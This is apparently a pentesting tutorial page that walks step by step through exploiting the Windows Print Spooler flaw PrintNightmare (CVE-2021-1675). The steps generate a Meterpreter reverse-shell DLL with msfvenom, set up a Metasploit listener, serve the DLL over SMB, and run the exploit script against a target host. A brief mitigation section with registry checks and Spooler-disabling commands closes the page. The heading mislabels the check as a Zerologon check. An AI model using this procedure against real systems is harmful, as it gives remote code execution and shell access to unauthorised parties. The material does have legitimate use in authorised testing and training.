> For the complete documentation index, see [llms.txt](https://ahmed-tarek.gitbook.io/security-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ahmed-tarek.gitbook.io/security-notes/notes/active-directory-pentesting/initial-attack-vectors/some-other-attacks/printnightmare-cve-2021-1675.md).

# PrintNightmare (CVE-2021-1675)

**PrintNightmare (CVE-2021-1675)**  is a critical vulnerability in the Windows Print Spooler service that allows remote code execution. This vulnerability can be exploited to execute malicious DLLs either remotely or locally on affected machines.

#### Step-by-Step Process to Check for Zerologon Vulnerability

1. **Check if the Domain is Vulnerable:**

   Use the following [script](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) to test if your domain is vulnerable to PrintNightmare:

<figure><img src="https://2317641019-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLOEWCqpy5OCVJux6qFwa%2Fuploads%2Fb9lbYG8OteymTbYsLw2g%2Fimage.png?alt=media&amp;token=9902768d-31ce-48db-95e3-5445c15ef6ac" alt=""><figcaption></figcaption></figure>

if you saw this output then your target is vulnrable.&#x20;

2. **Installation :**&#x20;

   Before executing the exploit, ensure you have the correct version of **Impacket** installed. Follow these steps:

   1. Uninstall the default Impacket version:

      ```bash
      pip3 uninstall impacket
      ```
   2. Clone the custom Impacket repository:

      ```bash
      git clone https://github.com/cube0x0/impacket
      cd impacket
      python3 ./setup.py install
      ```

To create a Meterpreter payload that will provide remote shell access, use **msfvenom** to generate a malicious DLL :&#x20;

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=5555 -f dll > shell.dll
```

<figure><img src="https://2317641019-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLOEWCqpy5OCVJux6qFwa%2Fuploads%2F74mbh7AYDw2euuZIGk2P%2Fimage.png?alt=media&amp;token=545d4cc2-c07b-4937-9d5b-0cc6dd26549a" alt=""><figcaption></figcaption></figure>

**3. Setting Up the Metasploit Listener**

1. **Open Metasploit Framework:**

<figure><img src="https://2317641019-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLOEWCqpy5OCVJux6qFwa%2Fuploads%2FNL5l1F8TfgfMA1DzA9sW%2Fimage.png?alt=media&amp;token=45ca8450-5c07-4b23-bd2d-645708586c4a" alt=""><figcaption></figcaption></figure>

**Use the `multi/handler` exploit:**

```bash
use exploit/multi/handler
```

**Set the payload:**

```bash
set payload windows/x64/meterpreter/reverse_tcp
```

**Configure the listener with your IP and port:**

```bash
set LHOST <your_ip>
set LPORT 5555
```

**Verify the settings:**

```bash
options
```

**Run the exploit:**

```bash
run
```

<figure><img src="https://2317641019-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLOEWCqpy5OCVJux6qFwa%2Fuploads%2FkR7lyxstAALBGRXThrSg%2Fimage.png?alt=media&amp;token=296a0c7c-c745-45dc-9729-4563ef317d0e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2317641019-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLOEWCqpy5OCVJux6qFwa%2Fuploads%2FIYp1fRZRv6Rs1pOgQW2t%2Fimage.png?alt=media&amp;token=b1b474c7-9fd2-499a-9ab4-89530774da42" alt=""><figcaption></figcaption></figure>

**4. Setting Up File Sharing (SMB)**

You need to share the location of your payload (`shell.dll`) so that it can be accessed by the target machine.

1. **Start an SMB server** to share the directory containing `shell.dll`:

   ```bash
   python3 smbserver.py share <path-to-your-directory> //You may need to use the -smb2support flag if SMBv1 doesn't work.
   ```

<figure><img src="https://2317641019-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLOEWCqpy5OCVJux6qFwa%2Fuploads%2FlcS7fU5qclTuhIpNaLmm%2Fimage.png?alt=media&amp;token=f3a8c18c-6701-492a-bef2-07c1214cf991" alt=""><figcaption><p>now we shred the whole currecnt directory </p></figcaption></figure>

**6. Running the PrintNightmare Exploit**

Now that everything is set up, execute the **PrintNightmare** exploit. This is done by running the `CVE-2021-1675.py` script.

```bash
python3 CVE-2021-1675.py <domain>/<any-user>:<password>@<target-ip> '\\<file-share-location>'
```

<figure><img src="https://2317641019-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLOEWCqpy5OCVJux6qFwa%2Fuploads%2FTsJtGRibV6pstfQqknVw%2Fimage.png?alt=media&amp;token=f92ee152-923a-4cae-8197-068db3f8b47f" alt=""><figcaption></figcaption></figure>

**7. Post-Exploit: Catch the Meterpreter Session**

After executing the exploit, you should see a connection from the target system in Metasploit. Once the payload is triggered, you'll have a Meterpreter session established, allowing you to interact with the compromised system.

#### Mitigation

**Microsoft has released patches** for this vulnerability, but the system may still be vulnerable if the following registry values are present:

```bash
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
```

To mitigate this vulnerability, ensure these values are set to the correct restrictions or disable the Print Spooler service altogether.

#### Disable the Spooler Service

You can disable the **Spooler service** to prevent further exploitation:

```bash
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
```

This will stop and disable the Print Spooler service on the target machine.
